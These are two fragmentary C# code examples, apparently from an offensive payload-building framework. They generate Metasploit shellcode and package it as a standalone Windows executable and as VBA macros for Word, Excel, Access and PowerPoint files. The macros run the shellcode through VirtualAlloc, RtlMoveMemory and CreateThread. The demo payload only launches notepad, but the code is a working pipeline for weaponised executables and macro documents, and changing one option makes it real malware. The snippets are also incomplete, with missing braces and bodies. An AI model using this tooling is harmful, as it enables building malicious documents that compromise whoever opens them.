Example #1
        // Assembly Example with shellcode using Yasm + GoLink
        private static IAttack AssemblyShellcodeYasmGoLinkExample()
            var samplesOutput = new SamplesOutput();
            var attackName    = "AssemblyShellcodeYasmGoLink";
            var attack        = new Attack(new IOutput[] {
            }, name: attackName);

            // Metasploit payloads can be easily generated
            var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/x64/exec", options: "EXITFUNC=thread CMD=notepad");
            // They'll need to be wrapped in the appropriate Class.
            var shellcode = new ShellcodeX64(shellcodeBytes);
            // This is YASM Assembly Langauge that includes the shellcode instructions as-is
            var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(
                symbolName: "SheSellsShellCodesByTheSilkRoad", // A label for the start of the shellcode. Can be called like a function from C
                sectionWritable: true                          // Some shellcode needs to be in a memory page that has RWX permissions. This not one of them, but lets give the section Write permissions anyways
            var staticLibrary = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
            var entryPoint    = ((ICFunction)rawShellcodeAsm).Name;

            var linkerConfig     = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
            var createProcessExe = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);

            samplesOutput.Add("AssemblyShellcodeYasmGoLinkNotepad.exe", createProcessExe); // Double click to confirm that notepad spawns

            // Note: Linking with MSVC instead of GoLink would also be an option

Example #2
        // Office VBAMacro Example
        private static IAttack OfficeVbaMacroExample()
            var samplesOutput = new SamplesOutput();
            var attackName    = "OfficeVbaMacro";
            var attack        = new Attack(new IOutput[] {
            }, name: attackName);

            var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/exec", options: "EXITFUNC=thread CMD=notepad");
            // Most installs of Microsft Office are 32 bit
            var shellcode = new ShellcodeX86(shellcodeBytes);
            // VbaMacro that uses VirtualAlloc + RtlMoveMemory + CreateThread to execute shellcode
            var vbaMacro = new ShellcodeVbaMacro(shellcode);

            var wordVbaMacro         = new WordVBAMacro(vbaMacro);
            var wordVbaMacroFilename = "WordVbaMacro" + "." + wordVbaMacro.Extension;

            samplesOutput.Add(wordVbaMacroFilename, wordVbaMacro);

            var excelVbaMacro         = new ExcelVBAMacro(vbaMacro);
            var excelVbaMacroFilename = "ExcelVbaMacro" + "." + excelVbaMacro.Extension;

            samplesOutput.Add(excelVbaMacroFilename, excelVbaMacro);

            var accessVbaMacro         = new AccessVBAMacro(vbaMacro);
            var accessVbaMacroFilename = "AccessVbaMacro" + "." + accessVbaMacro.Extension;

            samplesOutput.Add(accessVbaMacroFilename, accessVbaMacro);

            var powerPointVbaMacro         = new PowerPointVBAMacro(vbaMacro);
            var powerPointVbaMacroFilename = "PowerPointVbaMacro" + "." + powerPointVbaMacro.Extension;

            samplesOutput.Add(powerPointVbaMacroFilename, powerPointVbaMacro);
